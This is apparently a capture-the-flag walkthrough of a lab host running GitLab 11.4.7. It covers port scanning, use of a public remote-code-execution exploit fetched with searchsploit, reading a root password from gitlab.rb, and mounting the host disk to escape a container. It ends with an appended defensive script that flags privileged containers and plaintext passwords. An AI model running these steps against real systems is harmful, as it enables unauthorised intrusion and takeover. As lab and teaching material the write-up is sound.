nmap -A -p- -oA output 10.129.205.129 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210830134105.png

nmap -sC -sV -O -p- -oA ready 10.129.205.129

nmap -sU -O -p- -oA ready-udp 10.129.205.129

nikto -h 10.129.205.129:80

Pasted image 20210830134319.png

We see that ports 22 and 5080 are open.

We go to the page http://10.129.205.129:5080 and register.

Pasted image 20210830134505.png

whatweb http://10.129.205.129:5080

Pasted image 20210830134759.png

We register as a new user.

Pasted image 20210830135403.png

We go to Settings and then Access Tokens. We enable the api checkbox.

Pasted image 20210830135546.png

We see the new Access Token.

Pasted image 20210830135715.png

curl -s -X GET "http://10.129.205.129:5080/api/v4/version" -H "PRIVATE-TOKEN: NuLqEr5GZ1-WL65sALq2" | jq

Pasted image 20210830140018.png

searchsploit gitlab 11.4.7

Pasted image 20210830140048.png

searchsploit -m 49257.py

Pasted image 20210830140756.png

We change the appropriate attributes so that the script works.

python3 49257.py

Pasted image 20210830141205.png

cd dude

Pasted image 20210830141516.png

sudo -l

find / -perm -4000 2>/dev/null

Pasted image 20210830141730.png

cd opt

grep "sh$" /etc/passwd

Pasted image 20210830142048.png

cat docker-compose.yml

Pasted image 20210830142310.png

grep "pass" gitlab.rb

Pasted image 20210830142435.png

su root

We enter the password found in the previous screenshot.

Pasted image 20210830142942.png

fdisk -l

Pasted image 20210830143529.png

mkdir /mnt/mounted

mount /dev/sda2 /mnt/mounted/

cd /mnt/mounted

Pasted image 20210830144017.png
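A defender-side audit for the two weaknesses this walkthrough chains, a live password left in gitlab.rb and a GitLab container with enough privilege to see and mount the host disk. This is an added example, not part of the original notes; it assumes the container was started with `privileged: true` (the likely reason `fdisk -l` shows `/dev/sda2` from inside it), and the docker-compose.yml and gitlab.rb fragments are constructed, with EXAMPLE_PLACEHOLDER standing in for the real secret.

```python
import re

# Constructed docker-compose.yml fragment (not the box's real file); the
# privileged flag is an assumption about how the GitLab container was run.
SAMPLE_COMPOSE = """\
version: '3'
services:
  web:
    image: gitlab/gitlab-ce:11.4.7-ce.0
    privileged: true
    ports:
      - "5080:80"
    volumes:
      - ./srv/gitlab/config:/etc/gitlab
"""

# Constructed gitlab.rb fragment; the real password is not reproduced.
SAMPLE_GITLAB_RB = """\
# gitlab_rails['smtp_password'] = "smtp password"
gitlab_rails['smtp_password'] = "EXAMPLE_PLACEHOLDER"
postgresql['enable'] = true
"""

def compose_risks(text):
    """Return compose lines that weaken container isolation: privileged mode,
    host device passthrough, SYS_ADMIN capability, host PID/network namespace."""
    patterns = [r"^\s*privileged:\s*true", r"^\s*devices:",
                r"^\s*-\s*SYS_ADMIN\b", r"^\s*(pid|network_mode):\s*[\"']?host"]
    return [line.strip() for line in text.splitlines()
            if any(re.match(p, line) for p in patterns)]

def plaintext_passwords(text):
    """Return (key, value) pairs for uncommented *password* settings in
    gitlab.rb that carry a non-empty string literal, i.e. live secrets."""
    hits = []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue  # commented-out defaults are not live secrets
        m = re.match(r"^\s*([\w\[\]']*pass(?:word)?[\w\[\]']*)\s*=\s*[\"']([^\"']+)[\"']",
                     line, re.I)
        if m:
            hits.append((m.group(1), m.group(2)))
    return hits

if __name__ == "__main__":
    print("compose risks:", compose_risks(SAMPLE_COMPOSE))
    print("live passwords:", plaintext_passwords(SAMPLE_GITLAB_RB))
```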

boxes

Copyright © 2022 Cu3rv0x, all rights reserved